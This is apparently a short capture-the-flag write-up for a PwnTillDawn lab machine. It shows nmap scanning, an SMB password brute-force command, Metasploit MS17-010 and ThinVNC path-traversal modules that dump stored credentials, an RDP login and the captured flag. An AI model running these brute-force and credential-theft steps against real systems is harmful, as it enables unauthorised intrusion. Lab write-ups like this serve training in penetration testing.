ptd-elmariachi-pc-private

As always i start with a nmap scan

┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for 10.150.150.69
Host is up (0.032s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #

$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.150.150.69:445 – An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Password Brute-forcing using Nmap


ubuntu@ubuntu:~$ nmap –script smb-brute -p445 10.150.150.69 –script-args userdb=users.txt,passdb=passwords.txt

Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.

cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.

git clone https://github.com/vulnersCom/nmap-vulners.git

Cloning into ‘nmap-vulners’…
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.

http://10.150.150.69:60000/
thinvnc
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >

flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/  and https://online.pwntilldawn.com/  in your write-up.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *